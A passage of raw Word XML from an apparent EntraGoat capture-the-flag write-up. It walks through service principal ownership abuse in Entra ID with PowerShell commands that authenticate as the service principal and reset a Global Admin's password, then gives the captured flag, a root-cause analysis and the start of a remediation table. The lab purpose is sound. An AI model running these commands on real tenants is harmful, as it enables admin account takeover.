        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9500"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="4F51E763" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0F1A2B"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="66CFB70F"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$secureSecret = ConvertTo-SecureString -String $clientSecret -AsPlainText -Force</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49AEA85E"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$credential = New-Object System.Management.Automation.PSCredential($SP.AppId, $secureSecret)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C7E09E5"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Connect-MgGraph -TenantId $tenantId -ClientSecretCredential $credential</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A4E77AD"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Get-MgContext   # confirms identity = the SP's AppId, not David</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14269C01" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>With the SP's Privileged Authentication Administrator role now in effect, reset the target Global Admin's password:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9500" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="334155"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="334155"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="334155"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="334155"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9500"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="6B30BC37" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0F1A2B"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="283BA071"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$targetAdmin = Get-MgUser -Filter "startswith(userPrincipalName, 'EntraGoat-admin-s1')"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1286CCDF"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$newAdminPassword = "EntraGoat-$(Get-Date -Format 'yyyyMMdd-HHmmss')!"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="586E34DE"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$passwordProfile = @{ Password = $newAdminPassword; ForceChangePasswordNextSignIn = $false }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16EF08C9"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Update-MgUser -UserId $targetAdmin.Id -PasswordProfile $passwordProfile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47B188D5" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="1E3A5F"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 10 — Flag retrieval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DB4127" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The target admin's extensionAttribute1 was read directly via Microsoft Graph, still authenticated as the service principal (avoiding an interactive sign-in blocked by missing Graph CLI consent for the admin account):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9493" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="334155"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="334155"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="334155"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="334155"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9493"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="683C3F3E" w14:textId="77777777" w:rsidTr="00965917">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9493" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0F1A2B"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2E97D6D3" w14:textId="77777777" w:rsidR="00965917" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="20"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:noProof/>
                <w:color w:val="D7E4F2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:noProof/>
                <w:color w:val="D7E4F2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Invoke-MgGraphRequest -Uri "https://graph.microsoft.com/v1.0/users/$($targetAdmin.Id)?`$select=id,userPrincipalName,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="765F2C9D" w14:textId="33F3E4A8"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onPremisesExtensionAttributes" |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C3F6CC3"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 xml:space="preserve">    Select-Object @{n='UPN';e={$_.userPrincipalName}}, @{n='Flag';e={$_.onPremisesExtensionAttributes.extensionAttribute1}}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A531586" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="1E3A5F"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 11 — Cleanup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106D9405" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The added client secret was removed and the scenario's official cleanup script was run to restore the tenant to its pre-exploitation state:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9500" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="334155"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="334155"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="334155"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="334155"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9500"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="5757776B" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0F1A2B"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="56D42B3A"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Remove-MgServicePrincipalPassword -ServicePrincipalId $SP.Id -KeyId $newSecret.KeyId</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="248B3EBE"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cd scenarios</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CF2BD5E" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="20"/>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:noProof/>
                <w:color w:val="D7E4F2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.\EntraGoat-Scenario1-Cleanup.ps1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="518D2D85" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="30182581" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc243301432"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.2 The Flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9500" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="1E8449"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="1E8449"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="1E8449"/>
          <w:right w:val="single" w:sz="6" w:space="0" w:color="1E8449"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9500"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="12CF43C2" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EAFAF1"/>
            <w:tcMar>
              <w:top w:w="160" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="160" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="296385B4" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="1E8449"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SCENARIO 1 — FLAG CAPTURED</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A0D1AF0" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="0B1F3A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>EntraGoat{SP_0wn3rsh1p_Pr1v_Esc@l@t10n_Congratz!}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13CF4D25" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
                <w:color w:val="6B7280"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Retrieved from EntraGoat-admin-s1@wwlx961259.onmicrosoft.com → onPremisesExtensionAttributes.extensionAttribute1, via Microsoft Graph authenticated as the Finance Analytics Dashboard service principal.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34672F9C" w14:textId="6C2CB2DE" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00965917">
      <w:pPr>
        <w:spacing w:before="300"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09D6CF03" wp14:editId="4E7CFFB4">
            <wp:extent cx="5943600" cy="3599180"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1640215131" name="Grafik 1" descr="Misowned and Dangerous - Owner's Manual to Global Admin,&#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15131" name="Grafik 1" descr="Misowned and Dangerous - Owner's Manual to Global Admin,&#10;&#10;KI-generierte Inhalte können fehlerhaft sei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599180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="759A4E1B" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc243301433"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6.3 The Why — Underlying Security Flaw</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="3BB36B3A" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The exploit chain rests on three compounding issues:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D256F01" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ownership is not least-privilege. Microsoft Graph allows a service principal's owner to manage its credentials — adding client secrets or certificates — without administrator approval or any alert. Ownership is often treated as a soft, administrative convenience, but it is functionally equivalent to holding the application's own identity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50205886" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A privileged role was assigned to an application identity, not a human. The service principal held Privileged Authentication Administrator directly — a role that can reset authentication methods, including passwords, for any user in the tenant, including Global Administrators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F0DA89" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Delegated vs. app-only security boundaries differ. David's own delegated permissions were negligible, but once authenticated as the SP (app-only context), the security boundary shifted entirely to whatever the SP itself was authorized to do.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FC62AE" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Unchecked ownership chains of this kind are a recognized escalation pattern (service principal ownership abuse), typically arising from open app registration defaults, apps that later receive privileged roles, ownership grants never revoked, or multi-tenant app consent flows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72628DCA" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc243301434"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.4 The Fix</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="95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2900"/>
        <w:gridCol w:w="5300"/>
        <w:gridCol w:w="1300"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="1BC68286" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="49E683C1" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B59693E" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2027391B" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="17227568" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2900" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="298A0D9F" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Remove unnecessary SP ownership</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5300" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3039566B" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Audit and remove david.martinez (and any non-essential owner) from the Finance Analytics Dashboard SP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C0392B"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22B50F8E" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
